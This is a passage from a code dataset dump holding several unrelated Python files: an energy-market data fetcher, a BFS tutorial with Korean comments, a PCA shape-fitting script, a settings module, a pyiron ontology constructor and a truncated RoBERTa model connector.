\"C:\\\\Users\\\\Omkar Sunkersett\\\\Downloads\\\\markets\"\n\n\t# These respective variables set the start and end dates for fetching data from the server\n\t#startdatetime = \"MM-DD-YYYY\"\n\t#enddatetime = \"MM-DD-YYYY\"\n\n\tif dbdt_check(\"MISO\", startdatetime, enddatetime):\n\t\t# Code for fetching the CSV files from the server for both DA and RT markets\n\t\tasm_da_off = MISO(\"https://www.misoenergy.org/Library/Repository/Market Reports\", \"_asm_da_co\", \".csv\", prog_dir)\n\t\t#asm_da_off.fetch_files(\"da\", startdatetime, enddatetime)\n\t\t#print (asm_da_off)\n\n\t\tasm_rt_off = MISO(\"https://www.misoenergy.org/Library/Repository/Market Reports\", \"_asm_rt_co\", \".csv\", prog_dir)\n\t\t#asm_rt_off.fetch_files(\"rt\", startdatetime, enddatetime)\n\t\t#print (asm_rt_off)\n\n\t\t# Code for loading the CSV data into the not-published database for both DA and RT markets\n\t\t# IMPORTANT: Make sure you have the latest backup of the database before uncommenting the below lines\n\t\t#print (\"\\nLoading the new data into the database...\\n\")\n\t\t#asm_da_off.etl_file_data(prog_dir + \"\\\\cache\\\\miso\\\\asm-da-co.txt\")\n\t\t#asm_rt_off.etl_file_data(prog_dir + \"\\\\cache\\\\miso\\\\asm-rt-co.txt\")\n\n\tprint (\"\\n********** End of the Program **********\\n\")\n\n\nmain()\n","repo_name":"omkar-sunkersett/summer-internship","sub_path":"miso-final.py","file_name":"miso-final.py","file_ext":"py","file_size_in_byte":13824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41076188029","text":"# BFS \n\n# BFS 알고리즘은 '너비 우선 탐색' 이라는 의미를 가진다. 쉽게 말해 가까운 노드부터 탐색하는 알고리즘이다. \n# DFS는 최대한 멀리 있는 노드를 우선으로 탐색하는 방식으로 동작하는데, BFS는 그 반대다.\n# 선입선출 방식인 큐 자료구조를 이용해 구현한다.\n# 인접한 노드를 반복적으로 큐에 넣도록 알고리즘을 작성하면 자연스럽게 먼저 들어온 것이 먼저 나가게 되어, \n# 가까운 노드부터 탐색을 진행하게 된다.\n\n# 알고리즘의 정확한 동작 방식은 다음과 같다.\n\n# 1. 탐색 시작 노드를 큐에 삽입하고 방문 처리를 한다.\n# 2. 큐에서 노드를 꺼내 해당 노드의 인접 노드 중에서 방문하지 않은 노드를 모두 큐에 삽입하고 방문 처리를 한다.\n# 3. 2번의 과정을 더 이상 수행할 수 없을 때 까지 반복한다.\n\nfrom collections import deque\n\ndef bfs(graph, start, visited):\n # 큐 구현을 위해 deque 라이브러리 사용\n queue = deque([start])\n # 현재 노드를 방문 처리\n visited[start] = True \n \n # 큐가 빌 때 까지 반복\n while queue:\n # 큐에서 하나의 원소를 뽑아 출력\n v = queue.popleft()\n print(v, end = ' ')\n # 해당 원소와 연결된, 아직 방문하지 않은 원소들을 큐에 삽입\n for i in graph[v]:\n if not visited[i]:\n queue.append(i)\n visited[i] = True\n\ngraph = [\n [],\n [2, 3, 8],\n [1, 7],\n [1, 4, 5],\n [3, 5],\n [3, 4],\n [7],\n [2, 6, 8],\n [1, 7]\n]\n\nvisited = [False] * 9\n\nbfs(graph, 1, visited)\n\n\n\n\n\n\n# from collections import deque\n\n# queue = deque()\n\n# queue.append(5)\n# queue.append(2)\n# queue.append(3)\n# queue.append(7)\n# queue.popleft()\n# queue.append(1)\n# queue.append(4)\n# queue.popleft()\n\n# print(queue)\n# queue.reverse()\n# print(queue)\n\n\n\n\n\n# 재귀함수\n\n# def recursive_function(i):\n# if i == 10:\n# return\n# print(i, '번째 재귀 함수에서', i+1, '번째 재귀 함수를 호출합니다.')\n# recursive_function(i+1)\n# print(i, '번째 재귀 함수를 종료합니다')\n \n# recursive_function(1) \n\n\n# def factorial_iterative(n):\n# result = 1\n# for i in range(1, n+1):\n# result *= i\n# return result \n\n# def factorial_recursive(n):\n# if n <= 1:\n# return 1\n# return n * factorial_recursive(n-1)\n\n\n\nfrom collections import deque\n\ndef bfs(graph, start, visited):\n # 큐 구현을 위해 deque 라이브러리 사용\n queue = deque([start])\n # 현재 노드를 방문 처리\n visited[start] = True\n \n # 큐가 빌 때까지 반복\n while queue:\n # 큐에서 하나의 원소를 뽑아 출력\n v = queue.popleft()\n print(v, end=' ')\n \n # 해당 원소와 연결된, 아직 방문하지 않은 원소들을 큐에 삽입\n for i in graph[v]:\n if not visited[i]:\n queue.append(i)\n visited[i] = True\n \n \n \n\n# 4. 미로 탈출(bfs)\n \nfrom collections import deque\n\nn, m = map(int, input().split())\ngraph = []\nfor i in range(n):\n graph.append(list(map(int, input())))\n\n# 이동할 네 방향 정의 : 상 하 좌 우 \ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\n# BFS 소스코드 구현\ndef bfs(x, y):\n queue = deque()\n queue.append((x, y))\n \n # 큐가 빌 때까지 반복\n while queue:\n x, y = queue.popleft()\n # 현재 위치에서 네 방향으로의 위치 확인\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n \n # 미로 찾기 공간을 벗어난 경우 무시\n if nx < 0 or ny < 0 or nx >= n or ny >= m:\n continue\n \n # 벽인 경우 무시\n if graph[nx][ny] == 0:\n continue\n \n # 해당 노드를 처음 방문하는 경우에만 최단 거리 기록\n if graph[nx][ny] == 1:\n graph[nx][ny] = graph[x][y] + 1\n queue.append((nx, ny))\n \n return graph[n-1][m-1] \n\nprint(bfs(0,0)) ","repo_name":"Playground-maker/PS_directory-python-","sub_path":"이코테연습/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36253413368","text":"\"\"\"\n Jacob Kaplan\n shape.py\n \n Purpose: Given a set of point coordinates in R^2 , compute and output the following:\n (a) The minimum and maximum x and y values.\n (b) The center of mass (average) x and y values.\n (c) The axis along which the data varies the least and the standard deviation of this variation.\n (d) The axis along which the data varies the most and the standard deviation of that variation.\n (e) The closet point form of the best fitting line (through the original data).\n (f) The implicit form of the line.\n (g) A decision about the shape that best describes the data\n (h) Output a MatPlotLib plot saved as an image containing a scatter plot of\n the points and of the center of mass\n\n * ,MMM8&&&. *\n MMMM88&&&&& .\n MMMM88&&&&&&&\n * MMM88&&&&&&&&\n MMM88&&&&&&&&\n 'MMM88&&&&&&'\n 'MMM8&&&' *\n |\\___/|\n ) ( . '\n =\\ /=\n )===( *\n / \\\n | |\n / \\\n \\ /\n _/\\_/\\_/\\__ _/_/\\_/\\_/\\_/\\_/\\_/\\_/\\_/\\_/\\_\n | | | |( ( | | | | | | | | | |\n | | | | ) ) | | | | | | | | | |\n | | | |(_( | | | | | | | | | |\n | | | | | | | | | | | | | | |\n | | | | | | | | | | | | | | |\n Sure you can take the eigenvalue of some points, but can you\n ever find the eigenvalue of your soul?\n\"\"\"\nimport sys\nimport numpy as np\nfrom numpy import linalg as la\n#import matplotlib.pyplot as plt\n\ndef xyValues(points):\n \"\"\"\n Take in array of points\n Return x values and y values of the points, respectively\n \"\"\"\n return points[:,0], points[:,1]\n\ndef eigen(points):\n \"\"\"\n Take in array of points\n Center points around the center of mass (mean)\n Create new 2xN matrix with the centered x values as the first row and\n the centered y values as the second row\n Use new 2xN matrix to create a covariance matrix\n Get eigenvalues and eigenvectors of the covariance matrix\n Return eigenvalues and eigenvectors\n \"\"\"\n N = points.shape[0]\n xVals, yVals = xyValues(points)\n xVals -= np.mean(xVals)\n yVals -= np.mean(yVals)\n stackPoints = np.stack((xVals,yVals))\n covarMatrix = np.cov(stackPoints)\n eigenvals, eigenvecs = la.eig(covarMatrix)\n eigenvals = np.sqrt(eigenvals - eigenvals/N)\n return eigenvals, eigenvecs\n\ndef getMinAxis(evals, evecs):\n \"\"\"\n Take in eigenvalues and eigenvectors of the points\n Return the first eigenvector and the second eigenvalue (these correspond\n to the minimum axis of the points)\n \"\"\"\n minAxis = evecs[0]\n sMin = evals[1]\n return minAxis, sMin\n\ndef getMaxAxis(evals, evecs):\n \"\"\"\n Take in eigenvalues and eigenvectors of the points\n Return the second eigenvector and the first eigenvalue (these correspond\n to the maximum axis of the points)\n \"\"\"\n maxAxis = evecs[1]\n sMax = evals[0]\n return maxAxis, sMax\n\ndef getClosestPoint(minAxis, xAvg, yAvg):\n \"\"\"\n Take in the info for the minimum axis, and the averages of the x and y values\n Calculate rho and p\n Return rho and p\n \"\"\"\n rho = minAxis[0] * yAvg + minAxis[1] * xAvg\n p = np.arccos(minAxis[1])\n return rho, p\n\ndef getShape(sMin, sMax, tau):\n \"\"\"\n Take in sMin, sMax, and tau\n Determine best fit and return it\n \"\"\"\n if sMin < (tau * sMax):\n return \"line\"\n else:\n return \"ellipse\"\n\ndef plot(xVals, yVals, comX, comY, a, b, c, outfig):\n \"\"\"\n Take in x and y values, the average of x and y values, the line of best fit,\n and the name of the file to save plot\n Set axes, plot x and y values, plot line of best fit, plot center of mass\n \"\"\"\n axes = plt.gca()\n axes.set_xlim([0,55])\n axes.set_ylim([0,55])\n plt.scatter(xVals, yVals)\n x = np.linspace(0,51,102)\n a = (a/b)\n c = -1*(c/b)\n y = c - a*x\n plt.plot(x, y,'-k')\n plt.plot(comX, comY, markersize=8, color=\"red\")\n plt.savefig(outfig)\n\nif __name__ == \"__main__\":\n \"\"\"\n Handle command line arguments\n \"\"\"\n if len(sys.argv) != 4:\n print(\"Correct usage: p3_shape points tau outfig\")\n sys.exit()\n else:\n pointsFile = sys.argv[1]\n tau = sys.argv[2]\n outfig = sys.argv[3]\n\n try:\n openFile = open(pointsFile, \"r\")\n except FileNotFoundError:\n print(\"No file {} found\".format(pointsFile))\n sys.exit()\n\n try:\n points = np.loadtxt(openFile, dtype=np.float64)\n except ValueError:\n print(\"Malformed points file: {}, must be numbers\".format(pointsFile))\n sys.exit()\n\n try:\n tau = float(tau)\n except ValueError:\n print(\"Tau must be number!\")\n sys.exit()\n\n \"\"\"\n Calculate and output stats\n \"\"\"\n xValues, yValues = xyValues(points)\n xCopy = np.copy(xValues)\n yCopy = np.copy(yValues)\n xAvg, yAvg = np.mean(xValues), np.mean(yValues)\n print(\"min: ({:.3f},{:.3f})\".format(np.min(xValues), np.min(yValues)))\n print(\"max: ({:.3f},{:.3f})\".format(np.max(xValues), np.max(yValues)))\n print(\"com: ({:.3f},{:.3f})\".format(xAvg, yAvg))\n\n eigenvals, eigenvecs = eigen(points)\n minAxis, sMin = getMinAxis(eigenvals, eigenvecs)\n maxAxis, sMax = getMaxAxis(eigenvals, eigenvecs)\n print(\"min axis: ({:.3f},{:.3f}), sd {:.3f}\".format(minAxis[1], minAxis[0], sMin))\n print(\"max axis: ({:.3f},{:.3f}), sd {:.3f}\".format(maxAxis[1], maxAxis[0], sMax))\n\n rho, theta = getClosestPoint(minAxis, xAvg, yAvg)\n a,b,c = minAxis[1], minAxis[0], -1*rho\n print(\"closest point: rho {:.3f}, theta {:.3f}\".format(rho, theta))\n print(\"implicit: a {:.3f}, b {:.3f}, c {:.3f}\".format(a,b,c))\n print(\"best as {}\".format(getShape(sMin, sMax, tau)))\n\n #plot(xCopy, yCopy, xAvg, yAvg, a, b, c, outfig)\n","repo_name":"jcolekaplan/computer_vision","sub_path":"shape/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36737914585","text":"from pathlib import Path\nimport os\n\ntry:\n import pwd\n USER = pwd.getpwuid(os.getuid())[0]\nexcept ModuleNotFoundError as e:\n USER = os.getlogin()\n\nPROJECT_DIR = Path(os.path.dirname(os.path.abspath(__file__)))\nWWW_STORAGE = PROJECT_DIR / \"www\"\nCACHE_STORAGE = PROJECT_DIR / \"data\"\n\nPROJECT_STRUCTURE = {\n \"dirs_to_make\": [\n PROJECT_DIR,\n WWW_STORAGE,\n CACHE_STORAGE\n ],\n \"info.json\": CACHE_STORAGE / \"info.json\",\n \"list.json\": CACHE_STORAGE / \"list.json\",\n}","repo_name":"shaenr/neomayor","sub_path":"neomayor/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74683245239","text":"from __future__ import annotations\n\nfrom typing import Optional\nfrom warnings import warn\n\nimport owlready2 as owl\nimport pint\n\nfrom pyiron_ontology.workflow import NodeTree\n\nUREG = pint.UnitRegistry()\n\n\nclass Constructor:\n def __init__(\n self,\n name: str,\n closed: bool = True,\n strict: bool = False,\n debug: int = 0,\n ):\n onto = owl.get_ontology(f\"file://{name}.owl\")\n self.onto = onto\n self._make_universal_declarations()\n self._make_specific_declarations()\n # TODO: Introduce a \"from_csv\" option for constructing, and leverage\n # `all_classes=False` in `declare_classes`?\n self.sync(closed=closed, strict=strict, debug=debug)\n\n def sync(\n self,\n closed=True,\n infer_property_values=True,\n infer_data_property_values=True,\n debug=0,\n strict=True,\n ):\n if closed:\n owl.close_world(self.onto.PyObject)\n with self.onto:\n owl.sync_reasoner_pellet(\n infer_property_values=infer_property_values,\n infer_data_property_values=infer_data_property_values,\n debug=debug,\n )\n inconsistent = list(self.onto.inconsistent_classes())\n if len(inconsistent) > 0:\n msg = f\"Inconsistent classes were found in the ontology: {inconsistent}\"\n if strict:\n raise RuntimeError(msg)\n else:\n warn(msg)\n\n def save(self):\n self.onto.save()\n\n def _make_specific_declarations(self):\n pass\n\n def _make_universal_declarations(self):\n with self.onto:\n\n class PyironOntoThing(owl.Thing):\n def get_sources(\n self, additional_requirements: list[Generic] = None\n ) -> list[WorkflowThing]:\n raise NotImplementedError\n\n def get_source_tree(self, additional_requirements=None):\n return build_tree(\n self, additional_requirements=additional_requirements\n )\n\n def get_source_path(self, *path_indices: int):\n return build_path(self, *path_indices)\n\n class Parameter(PyironOntoThing):\n def unit_conversion(self, other_unit: str) -> float:\n if self.unit is not None:\n return UREG(self.unit).to(other_unit).magnitude\n else:\n raise ValueError(\"Parameters must have a unit specified\")\n\n class has_unit(Parameter >> str, owl.FunctionalProperty):\n class_property_type = [\"some\"]\n python_name = \"unit\"\n\n class Generic(Parameter):\n def get_sources(\n self, additional_requirements: list[Generic] = None\n ) -> list[Output]:\n return [\n out\n for out in self.indirect_outputs\n if (\n out.satisfies(additional_requirements)\n if additional_requirements is not None\n else True\n )\n ]\n\n @staticmethod\n def only_get_thing_classes(things):\n return [\n is_a_class\n for is_a_class in things\n if isinstance(is_a_class, owl.ThingClass)\n ]\n\n @property\n def indirect_things(self):\n return self.only_get_thing_classes(self.INDIRECT_is_a)\n\n @property\n def indirect_io(self) -> list[Parameter]:\n generic_classes = self.only_get_thing_classes(self.is_a)\n unique_instances = list(\n set(generic_classes[0].instances()).union(\n *[gc.instances() for gc in generic_classes[1:]]\n )\n )\n return [p for ui in unique_instances for p in ui.parameters]\n\n @property\n def indirect_outputs(self) -> list[Output]:\n return [p for p in self.indirect_io if Output in p.is_a]\n\n @property\n def indirect_disjoints_set(self) -> set[Generic]:\n return get_disjoints_set(self.indirect_things)\n\n @property\n def representation_info(self):\n \"\"\"\n A more computationally efficient call when you know you need both\n the `indirect_disjoints` _and_ `indirect_things` properties at once.\n\n Returns:\n list, set: indirect things, indirect disjoints\n \"\"\"\n indirect_things = self.indirect_things\n indirect_disjoints = get_disjoints_set(indirect_things)\n return indirect_things, indirect_disjoints\n\n @classmethod\n def class_is_indirectly_disjoint_with(cls, other: owl.ThingClass):\n ancestors1 = list(cls.ancestors())\n ancestors2 = list(other.ancestors())\n combined_disjoints = get_disjoints_set(ancestors1).union(\n get_disjoints_set(ancestors2)\n )\n combined_ancestors = set(ancestors1).union(ancestors2)\n return len(combined_disjoints.intersection(combined_ancestors)) > 0\n\n def has_a_representation_among_others(self, others_info):\n my_things, my_disjoints = self.representation_info\n return any(\n compatible_classes(\n my_things,\n my_disjoints,\n other_things,\n other_disjoints,\n )\n for (other_things, other_disjoints) in others_info\n )\n\n class WorkflowThing(PyironOntoThing):\n pass\n\n class Function(WorkflowThing):\n def get_sources(\n self, additional_requirements: list[Generic] = None\n ) -> list[Input]:\n return self.mandatory_inputs\n\n @property\n def inputs(self):\n return self.mandatory_inputs + self.optional_inputs\n\n @property\n def options(self):\n return [\n opt\n for inp in self.inputs\n for opt in [inp.generic]\n + inp.requirements\n + inp.transitive_requirements\n ]\n\n class IO(Parameter, WorkflowThing):\n pass\n\n class has_generic(IO >> Generic, owl.FunctionalProperty):\n python_name = \"generic\"\n\n class has_for_parameter(Generic >> IO, owl.InverseFunctionalProperty):\n python_name = \"parameters\"\n inverse_property = has_generic\n\n class has_hdf_path(IO >> str, owl.FunctionalProperty):\n python_name = \"hdf_path\"\n\n class Output(IO):\n def get_sources(\n self, additional_requirements: list[Generic] = None\n ) -> list[Function]:\n return [self.output_of]\n\n @property\n def options(self):\n return self.output_of.options\n\n def satisfies(self, requirements: list[Generic]) -> bool:\n others_info = [\n other.representation_info\n for other in self.options + [self.generic]\n ]\n return all(\n requirement.has_a_representation_among_others(others_info)\n for requirement in requirements\n )\n\n class is_output_of(Output >> Function, owl.FunctionalProperty):\n python_name = \"output_of\"\n\n class has_for_output(Function >> Output, owl.InverseFunctionalProperty):\n python_name = \"outputs\"\n inverse_property = is_output_of\n\n class Input(IO):\n def get_sources(\n self, additional_requirements: Optional[list[Generic]] = None\n ) -> list[Output]:\n return self.get_sources_and_passed_requirements(\n additional_requirements=additional_requirements\n )[0]\n\n def get_sources_and_passed_requirements(\n self, additional_requirements: Optional[list[Generic]] = None\n ) -> tuple[list[Output], list[Generic]]:\n requirements = self.get_requirements(\n additional_requirements=additional_requirements\n )\n sources = self.generic.get_sources(\n additional_requirements=requirements\n )\n return sources, requirements\n\n def get_requirements(self, additional_requirements=None):\n \"\"\"\n For each additional requirement, see if it is as or more specific\n than an existing requirement (from among the generic class,\n requirements, and transitive requirements), and if so keep it\n (discarding the original if in the generic class or requirements,\n appending if it's a transitive requirement that we're actually\n receiving).\n \"\"\"\n if additional_requirements is None:\n return [self.generic] + self.requirements\n requirements = [self.generic] + self.requirements\n\n base_infos = [other.representation_info for other in requirements]\n transitive_infos = [\n other.representation_info\n for other in self.transitive_requirements\n ]\n\n for add_req in additional_requirements:\n add_things, add_disjoints = add_req.representation_info\n used = False # For early breaking if we use the additional req\n for i, (base_things, base_disjoints) in enumerate(base_infos):\n if self.candidate_is_as_or_more_specific_than(\n add_things, base_disjoints, base_things\n ):\n requirements[i] = add_req # Overwrite the thing you're\n # more specific than\n used = True\n break\n if used:\n continue\n\n for trans_things, trans_disjoints in transitive_infos:\n # If you haven't found the additional requirement yet,\n # check if it's in the allowed transitive requirements\n if compatible_classes(\n add_things,\n add_disjoints,\n trans_things,\n trans_disjoints,\n ):\n requirements.append(add_req)\n break\n return requirements\n\n @staticmethod\n def candidate_is_as_or_more_specific_than(\n candidate_things, ref_disjoints, ref_things\n ) -> bool:\n not_disjoint = (\n len(ref_disjoints.intersection(candidate_things)) == 0\n )\n return not_disjoint and set(ref_things).issubset(candidate_things)\n\n class is_optional_input_of(Input >> Function, owl.FunctionalProperty):\n python_name = \"optional_input_of\"\n\n class has_for_optional_input(\n Function >> Input, owl.InverseFunctionalProperty\n ):\n python_name = \"optional_inputs\"\n inverse_property = is_optional_input_of\n\n class is_mandatory_input_of(Input >> Function, owl.FunctionalProperty):\n python_name = \"mandatory_input_of\"\n\n class has_for_mandatory_input(\n Function >> Input, owl.InverseFunctionalProperty\n ):\n python_name = \"mandatory_inputs\"\n inverse_property = is_mandatory_input_of\n\n class has_for_requirement(Input >> Generic):\n python_name = \"requirements\"\n\n class is_requirement_of(Generic >> Input):\n python_name = \"requirement_of\"\n inverse_property = has_for_requirement\n\n class has_for_transitive_requirement(Input >> Generic):\n python_name = \"transitive_requirements\"\n\n class is_transitive_requirement_of(Generic >> Input):\n python_name = \"transitive_requirement_of\"\n inverse_property = has_for_transitive_requirement\n\n owl.AllDisjoint([is_optional_input_of, is_mandatory_input_of])\n owl.AllDisjoint([Input, Function, Output, Generic])\n\n def compatible_classes(\n things1: list[owl.ThingClass],\n disjoints1: set[owl.ThingClass],\n things2: list[owl.ThingClass],\n disjoints2: set[owl.ThingClass],\n ):\n \"\"\"\n Given the `is_a` and disjoint classes of two individuals, checks whether\n they are compatible -- i.e. whether the classes of one are in the disjoints\n of the other (which would lead to incompatibility).\n\n Args:\n things1 (list[owl.ThingClass]): Classes of the first indivual.\n disjoints1 (set[owl.ThingClass]): Disjoints of the first individual.\n things2 (list[owl.ThingClass]): Classes of the second individual.\n disjoints2 (set[owl.ThingClass]):\n\n Returns:\n (bool): Whether any classes of one individual are in the disjoints of\n the other.\n \"\"\"\n # Put 0 first so we can skip the second evaluation when the first fails\n return (\n 0\n == len(disjoints1.intersection(things2))\n == len(disjoints2.intersection(things1))\n )\n\n def get_disjoints_set(classes: list[owl.ThingClass]):\n \"\"\"\n For a list of things, get the set of all the things they're disjoint\n to\n \"\"\"\n disjoints = []\n for thing in classes:\n if thing == owl.Thing:\n continue\n try:\n entities = list(next(thing.disjoints()).entities)\n # The entities are the actual classes that are disjoint\n # The entities for each of the disjoints are ideantical,\n # so we can just use `next` to grab the first one\n entities.remove(thing)\n # The entities of our disjoint include us, so remove us\n disjoints += entities\n except StopIteration:\n # If the disjoints are empty, just continue\n continue\n return set(disjoints)\n\n def build_tree(\n parameter, parent=None, additional_requirements=None\n ) -> NodeTree:\n node = NodeTree(parameter, parent=parent)\n\n if isinstance(parameter, Input):\n (\n sources,\n additional_requirements,\n ) = parameter.get_sources_and_passed_requirements(\n additional_requirements=additional_requirements\n ) # Snag the accepted transitive requirements as well\n else:\n sources = parameter.get_sources(\n additional_requirements=additional_requirements\n )\n\n for source in sources:\n build_tree(\n source, parent=node, additional_requirements=additional_requirements\n )\n\n return node\n\n def build_path(\n parameter, *path_indices: int, parent=None, additional_requirements=None\n ):\n node = NodeTree(parameter, parent=parent)\n\n sources = parameter.get_sources(\n additional_requirements=additional_requirements\n )\n\n if len(path_indices) > 0:\n i, path_indices = path_indices[0], path_indices[1:]\n source = sources[i]\n _, sources = build_path(\n source,\n *path_indices,\n parent=node,\n additional_requirements=additional_requirements,\n )\n\n return node, sources\n","repo_name":"pyiron/pyiron_ontology","sub_path":"pyiron_ontology/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":17378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4586886638","text":"from fairseq.models.roberta import RobertaModel\nfrom fairseq import utils\nimport torch\nfrom pytorch_pretrained_bert import BertTokenizer\nfrom lama.modules.base_connector import *\nfrom lama.modules.bert_connector import CustomBaseTokenizer\n\n\nclass RobertaVocab(object):\n def __init__(self, roberta):\n self.roberta = roberta\n\n def __getitem__(self, arg):\n value = \"\"\n try:\n predicted_token_bpe = self.roberta.task.source_dictionary.string([arg])\n if (\n predicted_token_bpe.strip() == ROBERTA_MASK\n or predicted_token_bpe.strip() == ROBERTA_START_SENTENCE\n ):\n value = predicted_token_bpe.strip()\n else:\n value = self.roberta.bpe.decode(str(predicted_token_bpe)).strip()\n except Exception as e:\n print(arg)\n print(predicted_token_bpe)\n print(value)\n print(\"Exception {} for input {}\".format(e, arg))\n return value\n\n\nclass Roberta(Base_Connector):\n def __init__(self, args):\n super().__init__()\n roberta_model_dir = args.roberta_model_dir\n roberta_model_name = args.roberta_model_name\n roberta_vocab_name = args.roberta_vocab_name\n self.dict_file = \"{}/{}\".format(roberta_model_dir, roberta_vocab_name)\n self.model = RobertaModel.from_pretrained(\n roberta_model_dir, checkpoint_file=roberta_model_name\n )\n\n self.bpe = self.model.bpe\n self.task = self.model.task\n self._build_vocab()\n self._init_inverse_vocab()\n self.max_sentence_length = args.max_sentence_length\n\n # CD: Add custom tokenizer to avoid splitting the ['MASK'] token\n # self.tokenizer = BertTokenizer.from_pretrained(dict_file)\n # custom_basic_tokenizer = CustomBaseTokenizer(do_lower_case = do_lower_case)\n # self.tokenizer.basic_tokenizer = custom_basic_tokenizer\n\n def _cuda(self):\n self.model.cuda()\n\n def _build_vocab(self):\n self.vocab = []\n for key in range(ROBERTA_VOCAB_SIZE):\n predicted_token_bpe = self.task.source_dictionary.string([key])\n try:\n value = self.bpe.decode(predicted_token_bpe)\n\n if value[0] == \" \": # if the token starts with a whitespace\n value = value.strip()\n else:\n # this is subword information\n value = \"_{}_\".format(value)\n\n if value in self.vocab:\n # print(\"WARNING: token '{}' is already in the vocab\".format(value))\n value = \"{}_{}\".format(value, key)\n\n self.vocab.append(value)\n\n except Exception as e:\n self.vocab.append(predicted_token_bpe.strip())\n\n def get_id(self, input_string):\n # Roberta predicts ' London' and not 'London'\n string = \" \" + str(input_string).strip()\n text_spans_bpe = self.bpe.encode(string.rstrip())\n tokens = self.task.source_dictionary.encode_line(\n text_spans_bpe, append_eos=False\n )\n return tokens.long()\n\n def get_batch_generation(self, sentences_list, logger=None, try_cuda=True):\n if not sentences_list:\n return None\n if try_cuda:\n self.try_cuda()\n\n tensor_list = []\n masked_indices_list = []\n max_len = 0\n output_tokens_list = []\n for masked_inputs_list in sentences_list:\n\n tokens_list = []\n\n for idx, masked_input in enumerate(masked_inputs_list):\n\n # 2. sobstitute [MASK] with \n masked_input = masked_input.replace(MASK, ROBERTA_MASK)\n\n text_spans = masked_input.split(ROBERTA_MASK)\n text_spans_bpe = (\n (\" {0} \".format(ROBERTA_MASK))\n .join(\n [\n self.bpe.encode(text_span.rstrip())\n for text_span in text_spans\n ]\n )\n .strip()\n )\n\n prefix = \"\"\n if idx == 0:\n prefix = ROBERTA_START_SENTENCE\n\n tokens_list.append(\n self.task.source_dictionary.encode_line(\n prefix + \" \" + text_spans_bpe, append_eos=True\n )\n )\n\n tokens = torch.cat(tokens_list)[: self.max_sentence_length]\n output_tokens_list.append(tokens.long().cpu().numpy())\n\n if len(tokens) > max_len:\n max_len = len(tokens)\n tensor_list.append(tokens)\n masked_index = (tokens == self.task.mask_idx).nonzero().numpy()\n for x in masked_index:\n masked_indices_list.append([x[0]])\n\n pad_id = self.task.source_dictionary.pad()\n tokens_list = []\n for tokens in tensor_list:\n pad_lenght = max_len - len(tokens)\n if pad_lenght > 0:\n pad_tensor = torch.full([pad_lenght], pad_id, dtype=torch.int)\n tokens = torch.cat((tokens, pad_tensor))\n tokens_list.append(tokens)\n\n batch_tokens = torch.stack(tokens_list)\n\n with torch.no_grad():\n # with utils.eval(self.model.model):\n self.model.eval()\n self.model.model.eval()\n log_probs, extra = self.model.model(\n batch_tokens.long().to(device=self._model_device),\n features_only=False,\n return_all_hiddens=False,\n )\n\n return log_probs.cpu(), output_tokens_list, masked_indices_list\n\n def __get_input_tensors(self, sentences):\n\n if len(sentences) > 2:\n print(sentences)\n raise ValueError(\"BERT accepts maximum two sentences in input for each data point\")\n\n first_tokenized_sentence = self.tokenizer.tokenize(sentences[0])\n first_segment_id = np.zeros(len(first_tokenized_sentence), dtype=int).tolist()\n\n # add [SEP] token at the end\n first_tokenized_sentence.append(BERT_SEP)\n first_segment_id.append(0)\n\n if len(sentences)>1 :\n second_tokenized_sentece = self.tokenizer.tokenize(sentences[1])\n second_segment_id = np.full(len(second_tokenized_sentece),1, dtype=int).tolist()\n\n # add [SEP] token at the end\n second_tokenized_sentece.append(BERT_SEP)\n second_segment_id.append(1)\n\n tokenized_text = first_tokenized_sentence + second_tokenized_sentece\n segments_ids = first_segment_id + second_segment_id\n else:\n tokenized_text = first_tokenized_sentence\n segments_ids = first_segment_id\n\n # add [CLS] token at the beginning\n tokenized_text.insert(0,BERT_CLS)\n segments_ids.insert(0,0)\n\n # look for masked indices\n masked_indices = []\n for i in range(len(tokenized_text)):\n token = tokenized_text[i]\n if token == MASK:\n masked_indices.append(i)\n\n indexed_tokens = self.tokenizer.convert_tokens_to_ids(tokenized_text)\n\n # Convert inputs to PyTorch tensors\n tokens_tensor = torch.tensor([indexed_tokens])\n segments_tensors = torch.tensor([segments_ids])\n\n return tokens_tensor, segments_tensors, masked_indices, tokenized_text\n\n\n def __get_input_tensors_batch(self, sentences_list):\n tokens_tensors_list = []\n segments_tensors_list = []\n masked_indices_list = []\n tokenized_text_list = []\n max_tokens = 0\n for sentences in sentences_list:\n tokens_tensor, segments_tensor, masked_indices, tokenized_text = self.__get_input_tensors(sentences)\n tokens_tensors_list.append(tokens_tensor)\n segments_tensors_list.append(segments_tensor)\n masked_indices_list.append(masked_indices)\n tokenized_text_list.append(tokenized_text)\n # assert(tokens_tensor.shape[1] == segments_tensor.shape[1])\n if (tokens_tensor.shape[1] > max_tokens):\n max_tokens = tokens_tensor.shape[1]\n # print(\"MAX_TOKENS: {}\".format(max_tokens))\n # apply padding and concatenate tensors\n # use [PAD] for tokens and 0 for segments\n final_tokens_tensor = None\n final_segments_tensor = None\n final_attention_mask = None\n for tokens_tensor, segments_tensor in zip(tokens_tensors_list, segments_tensors_list):\n dim_tensor = tokens_tensor.shape[1]\n pad_lenght = max_tokens - dim_tensor\n attention_tensor = torch.full([1,dim_tensor], 1, dtype= torch.long)\n if pad_lenght>0:\n pad_1 = torch.full([1,pad_lenght], self.pad_id, dtype= torch.long)\n pad_2 = torch.full([1,pad_lenght], 0, dtype= torch.long)\n attention_pad = torch.full([1,pad_lenght], 0, dtype= torch.long)\n tokens_tensor = torch.cat((tokens_tensor,pad_1), dim=1)\n segments_tensor = torch.cat((segments_tensor,pad_2), dim=1)\n attention_tensor = torch.cat((attention_tensor,attention_pad), dim=1)\n if final_tokens_tensor is None:\n final_tokens_tensor = tokens_tensor\n final_segments_tensor = segments_tensor\n final_attention_mask = attention_tensor\n else:\n 